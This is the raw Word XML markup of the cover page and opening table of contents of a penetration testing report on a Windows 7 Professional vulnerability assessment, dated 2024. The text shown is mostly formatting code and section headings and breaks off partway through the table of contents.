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D3D252" w14:textId="77777777" w:rsidR="00B20E9C" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1417" w:right="10488"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16556C36" wp14:editId="5FACBF94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7564994" cy="10692003"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="5073" name="Group 5073"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7564994" cy="10692003"/>
                          <a:chOff x="-4989" y="-1724"/>
                          <a:chExt cx="7564994" cy="10692003"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6520" name="Shape 6520"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="-4989" y="-1724"/>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DC143C"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6521" name="Shape 6521"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2160003" y="1464869"/>
                            <a:ext cx="5400002" cy="25311"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5400002" h="25311">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5400002" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5400002" y="25311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="253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 name="Rectangle 8"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2159867" y="3634106"/>
                            <a:ext cx="4265953" cy="949058"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="43B202D4" w14:textId="40B549AF" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="60"/>
                                  <w:szCs w:val="60"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="112"/>
                                  <w:sz w:val="60"/>
                                  <w:szCs w:val="60"/>
                                </w:rPr>
                                <w:t>Penetration Testing Report:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9" name="Rectangle 9"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2160003" y="4527681"/>
                            <a:ext cx="3974529" cy="313411"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="271DBD60" w14:textId="530F2C0F" w:rsidR="00B20E9C" w:rsidRDefault="00B20E9C"/>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="10" name="Rectangle 10"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2159909" y="4602480"/>
                            <a:ext cx="4583201" cy="721347"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="29175A59" w14:textId="5707C828" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                </w:rPr>
                                <w:t>Windows 7 Professional Vulnerability Assessment and Exploitation</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11" name="Rectangle 11"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2160003" y="5579235"/>
                            <a:ext cx="4518815" cy="339250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7CBB0C72" w14:textId="762ED517" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="38"/>
                                  <w:szCs w:val="38"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="103"/>
                                  <w:sz w:val="38"/>
                                  <w:szCs w:val="38"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Prepared by: </w:t>
                              </w:r>
                              <w:r w:rsidR="007F4E0B">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="103"/>
                                  <w:sz w:val="38"/>
                                  <w:szCs w:val="38"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t>skdas5405@gmail.com</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="Rectangle 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2159908" y="8476642"/>
                            <a:ext cx="1330051" cy="257972"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="689D787C" w14:textId="78553674" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>202</w:t>
                              </w:r>
                              <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>4</w:t>
                              </w:r>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>-0</w:t>
                              </w:r>
                              <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>8</w:t>
                              </w:r>
                              <w:r w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>-2</w:t>
                              </w:r>
                              <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:w w:val="98"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>4</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="16556C36" id="Group 5073" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:595.65pt;height:841.9pt;z-index:251658240;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="-49,-17" coordsize="75649,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">
                <v:shape id="Shape 6520" o:spid="_x0000_s1027" style="position:absolute;left:-49;top:-17;width:75599;height:106919;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" path="m,l7560005,r,10692003l,10692003,,e" fillcolor="#dc143c" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,7560005,10692003"/>
                </v:shape>
                <v:shape id="Shape 6521" o:spid="_x0000_s1028" style="position:absolute;left:21600;top:14648;width:54000;height:253;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5400002,25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" path="m,l5400002,r,25311l,25311,,e" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5400002,25311"/>
                </v:shape>
                <v:rect id="Rectangle 8" o:spid="_x0000_s1029" style="position:absolute;left:21598;top:36341;width:42660;height:9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3B202D4" w14:textId="40B549AF" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="60"/>
                            <w:szCs w:val="60"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="112"/>
                            <w:sz w:val="60"/>
                            <w:szCs w:val="60"/>
                          </w:rPr>
                          <w:t>Penetration Testing Report:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9" o:spid="_x0000_s1030" style="position:absolute;left:21600;top:45276;width:39745;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71DBD60" w14:textId="530F2C0F" w:rsidR="00B20E9C" w:rsidRDefault="00B20E9C"/>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 10" o:spid="_x0000_s1031" style="position:absolute;left:21599;top:46024;width:45832;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9175A59" w14:textId="5707C828" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                          </w:rPr>
                          <w:t>Windows 7 Professional Vulnerability Assessment and Exploitation</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 11" o:spid="_x0000_s1032" style="position:absolute;left:21600;top:55792;width:45188;height:3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CBB0C72" w14:textId="762ED517" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="008872A2">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="38"/>
                            <w:szCs w:val="38"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="103"/>
                            <w:sz w:val="38"/>
                            <w:szCs w:val="38"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Prepared by: </w:t>
                        </w:r>
                        <w:r w:rsidR="007F4E0B">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="103"/>
                            <w:sz w:val="38"/>
                            <w:szCs w:val="38"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t>skdas5405@gmail.com</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 12" o:spid="_x0000_s1033" style="position:absolute;left:21599;top:84766;width:13300;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89D787C" w14:textId="78553674" w:rsidR="00B20E9C" w:rsidRPr="008872A2" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>202</w:t>
                        </w:r>
                        <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>4</w:t>
                        </w:r>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>-0</w:t>
                        </w:r>
                        <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>8</w:t>
                        </w:r>
                        <w:r w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>-2</w:t>
                        </w:r>
                        <w:r w:rsidR="008872A2" w:rsidRPr="008872A2">
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="32"/>
                          </w:rPr>
                          <w:t>4</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="1797332126"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3F074DEE" w14:textId="40B9DE45" w:rsidR="00162FB3" w:rsidRPr="00162FB3" w:rsidRDefault="00162FB3">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:sz w:val="58"/>
              <w:szCs w:val="58"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00162FB3">
            <w:rPr>
              <w:sz w:val="58"/>
              <w:szCs w:val="58"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2881C4D8" w14:textId="0F252666" w:rsidR="00233899" w:rsidRDefault="00162FB3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00162FB3">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00162FB3">
            <w:rPr>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00162FB3">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc175499456" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499456 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="156948F2" w14:textId="62F1078A" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499457" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Overview</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499457 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0320216B" w14:textId="544ADFB8" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499458" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 High-Level Test Outcomes</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499458 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02AEAD83" w14:textId="21EAF4E1" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499459" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Overall Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499459 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02433172" w14:textId="7086CBFE" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499460" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4 Prioritized Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499460 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
